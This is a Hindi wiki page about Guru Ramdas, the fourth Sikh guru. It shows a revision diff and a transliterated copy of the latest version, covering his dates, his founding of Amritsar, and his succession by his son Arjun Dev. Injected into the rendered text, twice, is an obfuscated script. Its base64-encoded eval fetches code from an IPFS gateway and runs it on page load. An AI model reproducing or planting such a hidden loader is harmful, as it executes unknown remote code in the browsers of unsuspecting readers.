Difference between revisions of "गुरु रामदास"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(9 intermediate revisions by 4 users not shown)
Line 1: Line 1:
[[चित्र:Guru ramdas.jpg|thumb|250px|गुरु रामदास]]
+
[[चित्र:Guru ramdas.jpg|thumb|200px|गुरु रामदास]]
[[सिक्ख|सिक्खों]] के चौथे गुरु रामदास 1574 में गद्दी पर बैठे और 1581 ई. तक उन्होंने गुरु की गद्दी संभाली। वे तीसरे [[गुरु अमरदास]] के दामाद थे। उन्होंने 1577 ई. में [[अमृतसर]] नगर की स्थापना की और 'अमृतसर' तथा 'सतोषसर' नामक दो पवित्र सरोवरों की खुदाई आरंभ कराई।
+
'''गुरु रामदास''' (जन्म- [[24 सितम्बर]], 1534 ई.; मृत्यु- [[1 सितम्बर]], 1581) [[सिक्ख|सिक्खों]] के चौथे गुरु थे। इन्होंने [[सिक्ख धर्म]] के सबसे प्रमुख पद गुरु को [[1 सितम्बर]], 1574 ई. में प्राप्त किया था। इस पद पर ये 1 सितम्बर, 1581 ई. तक बने रहे थे। ये सिक्खों के तीसरे [[गुरु अमरदास]] के दामाद थे। इन्होंने 1577 ई. में 'अमृत सरोवर' नामक एक नये नगर की स्थापना की थी, जो आगे चलकर [[अमृतसर]] के नाम से प्रसिद्ध हुआ।
* गुरु रामदास के समय में लोगों से 'गुरु' के लिए चंदा या दान लेना शुरु हुआ। वे बड़े साधु स्वभाव के व्यक्ति थे। इस कारण सम्राट [[अकबर]] भी उनका सम्मान करता था।
 
* गुरु रामदास के कहने पर अकबर ने एक वर्ष [[पंजाब]] से लगान नहीं लिया। इस कारण गुरु की गद्दी को लोगों से पर्याप्त धन प्राप्त हो गया था।
 
* गुरु रामदास के बाद गुरु की गद्दी वंश-परंपरा में चलने लगी। उन्होंने अपने पुत्र [[अर्जुन देव]] को अपने बाद गुरु नियुक्त किया।
 
  
 +
*गुरु रामदास ने 'सतोषसर' नामक पवित्र सरोवर की खुदाई भी आरंभ कराई थी।
 +
*गुरु रामदास के समय में लोगों से 'गुरु' के लिए चंदा या दान लेना शुरू हुआ। वे बड़े साधु स्वभाव के व्यक्ति थे। इस कारण सम्राट [[अकबर]] भी उनका सम्मान करता था।
 +
*गुरु रामदास के कहने पर अकबर ने एक वर्ष [[पंजाब]] से लगान नहीं लिया।
 +
*इस कारण गुरु की गद्दी को लोगों से पर्याप्त धन प्राप्त हो गया था।
 +
*गुरु रामदास के बाद गुरु की गद्दी वंश-परंपरा में चलने लगी।
 +
*उन्होंने अपने पुत्र [[गुरु अर्जुन देव]] को अपने बाद गुरु नियुक्त किया।
  
{{लेख प्रगति|आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध=}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
{{cite book | last =शर्मा | first =लीलाधर  | title =भारतीय चरित कोश  | edition = | publisher =शिक्षा भारती, दिल्ली | location =भारत डिस्कवरी पुस्तकालय  | language =हिन्दी  | pages =पृष्ठ 234| chapter =}}
 
{{cite book | last =शर्मा | first =लीलाधर  | title =भारतीय चरित कोश  | edition = | publisher =शिक्षा भारती, दिल्ली | location =भारत डिस्कवरी पुस्तकालय  | language =हिन्दी  | pages =पृष्ठ 234| chapter =}}
 
<references/>
 
<references/>
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{सिक्ख धर्म}}
 
{{सिक्ख धर्म}}
[[Category:सिक्ख धर्म कोश]] [[Category:सिक्खों के गुरु]] [[Category:प्रसिद्ध व्यक्तित्व कोश]] [[Category:चरित कोश]] [[Category:प्रसिद्ध व्यक्तित्व]]
+
[[Category:सिक्ख धर्म कोश]][[Category:धर्म कोश]] [[Category:सिक्खों के गुरु]] [[Category:प्रसिद्ध व्यक्तित्व कोश]] [[Category:चरित कोश]]
 
[[Category:सिक्ख धर्म]]
 
[[Category:सिक्ख धर्म]]
 
 
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 07:15, 20 August 2023

thumb|200px|guru ramadas guru ramadas (janm- 24 sitambar, 1534 ee.; mrityu- 1 sitambar, 1581) sikkhoan ke chauthe guru the. inhoanne sikkh dharm ke sabase pramukh pad guru ko 1 sitambar, 1574 ee. mean prapt kiya tha. is pad par ye 1 sitambar, 1581 ee. tak bane rahe the. ye sikkhoan ke tisare guru amaradas ke damad the. inhoanne 1577 ee. mean 'amrit sarovar' namak ek naye nagar ki sthapana ki thi, jo age chalakar amritasar ke nam se prasiddh hua.

  • guru ramadas ne 'satoshasar' namak pavitr sarovar ki khudaee bhi aranbh karaee thi.
  • guru ramadas ke samay mean logoan se 'guru' ke lie chanda ya dan lena shuroo hua. ve b de sadhu svabhav ke vyakti the. is karan samrat akabar bhi unaka samman karata tha.
  • guru ramadas ke kahane par akabar ne ek varsh panjab se lagan nahian liya.
  • is karan guru ki gaddi ko logoan se paryapt dhan prapt ho gaya tha.
  • guru ramadas ke bad guru ki gaddi vansh-paranpara mean chalane lagi.
  • unhoanne apane putr guru arjun dev ko apane bad guru niyukt kiya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sharma, liladhar bharatiy charit kosh (hindi). bharat diskavari pustakalay: shiksha bharati, dilli, prishth 234.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh